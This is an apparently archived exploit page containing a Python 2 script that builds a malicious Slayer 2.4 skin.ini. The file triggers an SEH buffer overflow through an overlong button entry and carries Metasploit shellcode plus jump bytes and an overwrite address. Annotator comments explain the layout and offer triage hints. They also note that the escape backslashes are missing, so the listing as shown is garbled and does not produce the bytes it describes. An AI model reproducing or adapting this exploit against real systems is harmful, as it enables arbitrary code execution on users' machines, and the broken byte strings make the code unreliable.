
# Title : Slayer 2.4 (skin) Universal Buffer Overflow Exploit (SEH)
# Published : 2009-05-26
# Author : SuNHouSe2
# Previous Title : Winamp 5.551 MAKI Parsing Integer Overflow Exploit
# Next Title : PHP <= 5.2.9 Local Safemod Bypass Exploit (win32)


#!/usr/bin/python
# Python 2 script (print statement, raw_input) that writes a crafted Slayer 2.4
# skin.ini into a newly created directory. The code is kept byte-identical
# below; only comments were added.
#
# NOTE(review): every string literal in this listing uses `xNN` / `n`
# sequences with no leading backslash, apparently lost when the page was
# extracted. As written they are plain ASCII characters rather than byte
# escapes, so the file this listing produces, and the len() arithmetic further
# down, do not correspond to the layout the author's comments describe.
print "**************************************************************************"
print "[~]Slayer v2.4 (skin) Universal Seh Overflow Exploit (SEH)n"
print "[~]AUTHOR: SuNHouSe2 [ALGERIAN HaCkEr]n"
print "[~]Email : sunhouse2@yahoo.comn"
print "[~]HOME  : http://www.snakespc.comn" 
# Banner states the author's test platform; nothing in the script checks it.
print "[~]Tested on: Windows XP Pro SP3 (FR)n"
print "[~]Special ThanX : His0k4,& ALL Snakespc.com Membersn"
print "**************************************************************************"       

import os

# header1: hex-encoded skin INI text. Decoded, it is a "[SCREEN]" section
# (Mask=, Main=, Down=, Over=, Disabled= entries pointing at ../abd/*.bmp|jpg
# images), a blank line, then "[BUTTONINFO]" and the start of its first entry
# "1=". The overlong value below is appended directly after that "1=", so a
# skin.ini whose first [BUTTONINFO] entry is abnormally long is the artifact
# to look for when triaging files of this type.
header1=(
"x5bx53x43x52x45x45x4ex5dx0ax4dx61x73x6bx3dx2ex2ex2fx61x62x64"
"x2fx6dx61x73x6bx2ex62x6dx70x0ax4dx61x69x6ex3dx2ex2ex2fx61x62"
"x64x2fx6dx61x69x6ex2ex6ax70x67x0ax44x6fx77x6ex3dx2ex2ex2fx61"
"x62x64x2fx53x65x6cx65x63x74x65x64x2ex6ax70x67x0ax4fx76x65x72"
"x3dx2ex2ex2fx61x62x64x2fx4fx76x65x72x2ex6ax70x67x0ax44x69x73"
"x61x62x6cx65x64x3dx2ex2ex2fx61x62x64x2fx6dx61x69x6ex2ex6ax70"
"x67x0ax0ax5bx42x55x54x54x4fx4ex49x4ex46x4fx5dx0ax31x3d")

# header2: the remainder of a plausible skin.ini so the file still parses as a
# skin. Decoded, it continues the first [BUTTONINFO] entry
# (",324,76,24,16,Configuration,FALSE"), lists further B_* buttons (2= .. 12=),
# then "[PROGRESSINFO]" and "[TEXTINFO]" sections with ordinary-looking values.
header2=(
"x2cx33x32x34x2cx37x36x2cx32x34x2cx31x36x2cx43x6fx6ex66x69x67"
"x75x72x61x74x69x6fx6ex2cx46x41x4cx53x45x0ax32x3dx42x5fx56x4f"
"x42x2cx32x39x2cx33x31x2cx31x34x2cx31x35x2cx4cx61x6ex67x75x61"
"x67x65x20x53x65x6cx65x63x74x69x6fx6ex2cx46x41x4cx53x45x0ax33"
"x3dx42x5fx50x4cx41x59x4cx49x53x54x2cx37x30x2cx34x39x2cx31x34"
"x2cx31x35x2cx50x6cx61x79x6cx69x73x74x2cx46x41x4cx53x45x0ax34"
"x3dx42x5fx4dx55x54x45x2cx36x34x2cx37x35x2cx31x34x2cx31x35x2c"
"x4dx75x74x65x2cx46x41x4cx53x45x0ax35x3dx42x5fx46x55x4cx4cx53"
"x43x52x45x45x4ex2cx37x32x2cx32x36x2cx31x34x2cx31x35x2cx46x75"
"x6cx6cx73x63x72x65x65x6ex2cx46x41x4cx53x45x0ax36x3dx42x5fx41"
"x42x4fx55x54x2cx33x34x2cx38x36x2cx31x33x2cx31x33x2cx41x62x6f"
"x75x74x2cx46x41x4cx53x45x0ax37x3dx42x5fx4fx50x45x4ex2cx32x39"
"x39x2cx37x36x2cx32x34x2cx31x36x2cx4fx70x65x6ex2cx46x41x4cx53"
"x45x0ax38x3dx42x5fx43x4cx4fx53x45x2cx34x32x33x2cx35x2cx31x32"
"x2cx31x30x2cx43x6cx6fx73x65x2cx46x41x4cx53x45x0ax39x3dx42x5f"
"x50x52x45x56x2cx32x34x39x2cx37x36x2cx32x34x2cx31x36x2cx50x72"
"x65x76x69x6fx75x73x20x43x6cx69x70x2cx46x41x4cx53x45x0ax31x30"
"x3dx42x5fx4ex45x58x54x2cx32x37x34x2cx37x36x2cx32x34x2cx31x36"
"x2cx4ex65x78x74x20x43x6cx69x70x2cx46x41x4cx53x45x0ax31x31x3d"
"x42x5fx53x54x4fx50x2cx32x32x34x2cx37x36x2cx32x34x2cx31x36x2c"
"x53x74x6fx70x2cx46x41x4cx53x45x0ax31x32x3dx42x5fx50x4cx41x59"
"x2cx31x39x39x2cx37x36x2cx32x34x2cx31x36x2cx50x6cx61x79x2cx46"
"x41x4cx53x45x0ax0ax5bx50x52x4fx47x52x45x53x53x49x4ex46x4fx5d"
"x0ax31x3dx50x52x4fx47x52x45x53x53x5fx50x4fx53x2cx2cx31x34x39"
"x2cx37x30x2cx32x34x34x2cx34x2cx56x0ax0ax5bx54x45x58x54x49x4e"
"x46x4fx5dx0ax31x3dx54x45x58x54x5fx53x4cx41x59x45x52x2cx41x72"
"x69x61x6cx2cx54x52x55x45x2cx54x52x55x45x2cx2dx31x33x2cx38x33"
"x38x38x36x30x38x2cx31x36x30x2cx32x35x2cx38x30x2cx31x35x2cx0a"
"x32x3dx54x45x58x54x5fx43x4cx49x50x5fx4ex41x4dx45x2cx41x72x69"
"x61x6cx2cx46x41x4cx53x45x2cx54x52x55x45x2cx2dx31x31x2cx31x36"
"x37x31x31x36x38x30x2cx31x36x31x2cx34x30x2cx32x31x38x2cx31x35"
"x2cx0ax33x3dx54x45x58x54x5fx50x4fx53x2cx41x72x69x61x6cx2cx46"
"x41x4cx53x45x2cx54x52x55x45x2cx2dx31x31x2cx31x36x37x31x31x36"
"x38x30x2cx32x34x30x2cx32x35x2cx31x36x30x2cx31x35x2cx0ax34x3d"
"x54x45x58x54x5fx43x4cx49x50x5fx49x4ex46x4fx2cx41x72x69x61x6c"
"x2cx46x41x4cx53x45x2cx54x52x55x45x2cx2dx31x31x2cx31x36x37x31"
"x31x36x38x30x2cx31x36x31x2cx35x35x2cx35x30x2cx31x35x2cx0ax35"
"x3dx54x45x58x54x5fx54x49x50x2cx41x72x69x61x6cx2cx46x41x4cx53"
"x45x2cx54x52x55x45x2cx2dx31x31x2cx32x35x35x2cx33x30x30x2cx35"
"x35x2cx35x30x2cx31x35x2cx0a")

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# Author-labelled Metasploit payload: 10 lines of 16 sequences each, i.e. the
# 160 bytes the comment above states. It is a generic encoded blob, so the
# decoder stub, not the payload body, is what a byte-level signature would key
# on; behaviour is only asserted by the author's comment, not by this script.
shellcode=(
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x1e"
"xc7xd0x3cx83xebxfcxe2xf4xe2x2fx94x3cx1exc7x5bx79"
"x22x4cxacx39x66xc6x3fxb7x51xdfx5bx63x3exc6x3bx75"
"x95xf3x5bx3dxf0xf6x10xa5xb2x43x10x48x19x06x1ax31"
"x1fx05x3bxc8x25x93xf4x38x6bx22x5bx63x3axc6x3bx5a"
"x95xcbx9bxb7x41xdbxd1xd7x95xdbx5bx3dxf5x4ex8cx18"
"x1ax04xe1xfcx7ax4cx90x0cx9bx07xa8x30x95x87xdcxb7"
"x6exdbx7dxb7x76xcfx3bx35x95x47x60x3cx1exc7x5bx54"
"x22x98xe1xcax7ex91x59xc4x9dx07xabx6cx76x37x5ax38"
"x41xafx48xc2x94xc9x87xc3xf9xa4xb1x50x7dxc7xd0x3c")

# Buffer layout, in the order the author concatenates it. The comments below
# describe the intent implied by the arithmetic and the title; they are not
# verified against the target binary.
payload =  header1
# Filler of 0x41 sized so that filler + shellcode is 348 characters. The
# subtraction assumes len(shellcode) is the byte length of the decoded blob;
# in this listing len() counts the characters of the literal as written.
payload += "x41"*(348-len(shellcode))
payload += shellcode
# Five bytes, a 15-byte run of 0x90, four bytes, then 0x50 0x37 0x40 — the
# region that, per the title, overwrites the SEH record. 0x50 0x37 0x40 read
# little-endian is 0x403750, presumably an address inside the application
# (the title calls it "universal", i.e. not OS-dependent) — TODO confirm.
payload += "xE9x5BxFFxFFxFF"
payload += "x90"*15
payload += "xEBxEAxFFxFF"
payload += "x50x37x40"
payload +=  header2
try:
	# Creates "sunhouse" but then writes into "SuNHouSe/skin.ini": the two
	# names differ in case, so the open() only succeeds on a case-insensitive
	# filesystem such as the Windows XP setup named in the banner. On a
	# case-sensitive filesystem it raises and the bare except hides why.
	os.mkdir("sunhouse")
	# Text mode 'w': on Windows any 0x0a written here is translated to
	# CR LF, which changes the on-disk layout relative to the author's
	# offsets — presumably unnoticed or tolerated; confirm if reproducing.
	out_file = open(r'SuNHouSe/skin.ini', 'w')
	out_file.write(payload)
	out_file.close()
	# Python 2 raw_input used only as a "press Enter" pause; the string
	# argument is printed as the prompt.
	raw_input("nExploit file created!n")
except:
    # Bare except: swallows every error (including the EEXIST from running
    # the script twice, or the open() failing) and discards the exception
    # object, so the only diagnostic ever shown is the word "Error".
    print "Error"

# www.Syue.com [2009-05-26]